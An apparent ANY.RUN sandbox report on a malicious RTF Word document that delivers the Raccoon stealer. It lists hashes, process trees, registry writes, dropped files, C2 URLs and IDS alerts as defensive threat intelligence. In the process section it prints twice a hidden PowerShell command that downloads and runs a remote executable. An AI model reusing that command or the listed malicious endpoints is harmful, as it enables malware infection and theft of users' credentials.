File name:

0062_13012020.doc

Full analysis: https://app.any.run/tasks/d66838de-ea57-4dc8-81b1-26da14710bd9
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: January 13, 2020, 11:04:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
maldoc-13
trojan
opendir
loader
raccoon
stealer
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

227149093595883E873B255625A9826F

SHA1:

24E4A1A22B6E3F24CE22C1BE855494223724E152

SHA256:

4B48814CE6E5414710884DFEC169D0CB7D1C9BEAF30C268324D57C8106A9B78C

SSDEEP:

1536:mhbKTRtnpTvJEdh61RVueReVeEeyfzf/PxtoKXngRPLgMNAKrNbui3FRIxPILSQN:mhAWPARmxgLSQWnA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Loads dropped or rewritten executable

      • cham.exe (PID: 2492)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 4084)
    • Downloads executable files from the Internet

      • cham.exe (PID: 2492)
      • PowerShell.exe (PID: 2212)
    • RACCOON was detected

      • cham.exe (PID: 2492)
    • Actions looks like stealing of personal data

      • cham.exe (PID: 2492)
    • Application was dropped or rewritten from another process

      • cham.exe (PID: 2492)
    • Executable content was dropped or overwritten

      • WINWORD.EXE (PID: 4084)
    • Connects to CnC server

      • cham.exe (PID: 2492)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 4084)
    • Stealing of credential data

      • cham.exe (PID: 2492)
    • Requests a remote executable file from MS Office

      • WINWORD.EXE (PID: 4084)
    • Downloads executable files from IP

      • cham.exe (PID: 2492)
  • SUSPICIOUS

    • Connects to server without host name

      • cham.exe (PID: 2492)
    • Executable content was dropped or overwritten

      • PowerShell.exe (PID: 2212)
      • cham.exe (PID: 2492)
    • Creates files in the user directory

      • PowerShell.exe (PID: 736)
      • PowerShell.exe (PID: 2212)
    • Reads the cookies of Mozilla Firefox

      • cham.exe (PID: 2492)
    • Reads the cookies of Google Chrome

      • cham.exe (PID: 2492)
    • Creates files in the program directory

      • WINWORD.EXE (PID: 4084)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 4084)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 4084)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe powershell.exe no specs powershell.exe #RACCOON cham.exe

Process information

PID
CMD
Path
Indicators
Parent process
4084"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0062_13012020.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
736PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://nileapi.com/wp-admin/network/files/cham.exe','C:\Users\admin\AppData\Roaming\cham.exe');Start-Process 'C:\Users\admin\AppData\Roaming\cham.exe'"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2212PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://nileapi.com/wp-admin/network/files/cham.exe','C:\Users\admin\AppData\Roaming\cham.exe');Start-Process 'C:\Users\admin\AppData\Roaming\cham.exe'"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2492"C:\Users\admin\AppData\Roaming\cham.exe" C:\Users\admin\AppData\Roaming\cham.exe
PowerShell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\roaming\cham.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
Total events
2 518
Read events
2 054
Write events
331
Delete events
133

Modification events

(PID) Process:(4084) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:!/;
Value:
212F3B00F40F0000010000000000000000000000
(PID) Process:(4084) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(4084) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(4084) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(4084) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(4084) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(4084) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(4084) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(4084) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(4084) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1345126462
Executable files
62
Suspicious files
6
Text files
12
Unknown types
3

Dropped files

PID
Process
Filename
Type
4084WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRDFA1.tmp.cvr
MD5:
SHA256:
4084WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D48A0485.png
MD5:
SHA256:
736PowerShell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QDNZDCR07QKGEV0GKVXP.temp
MD5:
SHA256:
2212PowerShell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A4COWL8ESINLFGR2ZY3Q.temp
MD5:
SHA256:
2492cham.exeC:\Users\admin\AppData\LocalLow\frAQBc8Wsa
MD5:
SHA256:
2492cham.exeC:\Users\admin\AppData\LocalLow\1xVPfvJcrg
MD5:
SHA256:
2492cham.exeC:\Users\admin\AppData\LocalLow\RYwTiizs2t
MD5:
SHA256:
2492cham.exeC:\Users\admin\AppData\LocalLow\rQF69AzBla
MD5:
SHA256:
2492cham.exeC:\Users\admin\AppData\LocalLow\AdLibs\ff-funcs.zip
MD5:
SHA256:
2492cham.exeC:\Users\admin\AppData\LocalLow\passwords.txttext
MD5:27067F1913491016D42E3185DA610888
SHA256:12EFBBED167C3844B41367D55A35B6B9883399005B79CC75B5B4C29177FA1747
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
6
DNS requests
3
Threats
20

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2492
cham.exe
GET
200
35.240.77.90:80
http://35.240.77.90/gate/libs.zip
US
compressed
2.70 Mb
malicious
2492
cham.exe
POST
200
35.240.77.90:80
http://35.240.77.90/gate/log.php
US
text
399 b
malicious
4084
WINWORD.EXE
GET
200
104.24.119.10:80
http://nileapi.com/wp-admin/network/files/cham.exe
US
executable
534 Kb
malicious
2212
PowerShell.exe
GET
200
104.24.119.10:80
http://nileapi.com/wp-admin/network/files/cham.exe
US
executable
534 Kb
malicious
2492
cham.exe
POST
200
35.240.77.90:80
http://35.240.77.90/file_handler/file.php?hash=bbc9d7a6f17bbad87d7152ff996495692cff1bc4&js=09e0408a8dfbe00dfad868e00598726a95afc260&callback=http://35.240.77.90/gate
US
text
13 b
malicious
2492
cham.exe
GET
200
35.240.77.90:80
http://35.240.77.90/gate/sqlite3.dll
US
executable
895 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4084
WINWORD.EXE
104.24.119.10:80
nileapi.com
Cloudflare Inc
US
shared
2492
cham.exe
216.58.207.46:443
drive.google.com
Google Inc.
US
whitelisted
2492
cham.exe
172.217.22.1:443
doc-10-cc-docs.googleusercontent.com
Google Inc.
US
whitelisted
2492
cham.exe
35.240.77.90:80
US
malicious
2212
PowerShell.exe
104.24.119.10:80
nileapi.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
nileapi.com
  • 104.24.119.10
  • 104.24.118.10
malicious
drive.google.com
  • 216.58.207.46
shared
doc-10-cc-docs.googleusercontent.com
  • 172.217.22.1
shared

Threats

PID
Process
Class
Message
A Network Trojan was detected
ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious
A Network Trojan was detected
AV TROJAN Possible infected Wordpress - Payload download attempt
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
A Network Trojan was detected
ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious
A Network Trojan was detected
AV TROJAN Possible infected Wordpress - Payload download attempt
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
A Network Trojan was detected
AV TROJAN Trojan-Spy.MSIL.Stealer.ahp CnC Checkin
A Network Trojan was detected
STEALER [PTsecurity] Stealer.Raccoon
Potentially Bad Traffic
ET INFO Dotted Quad Host DLL Request
3 ETPRO signatures available at the full report
No debug info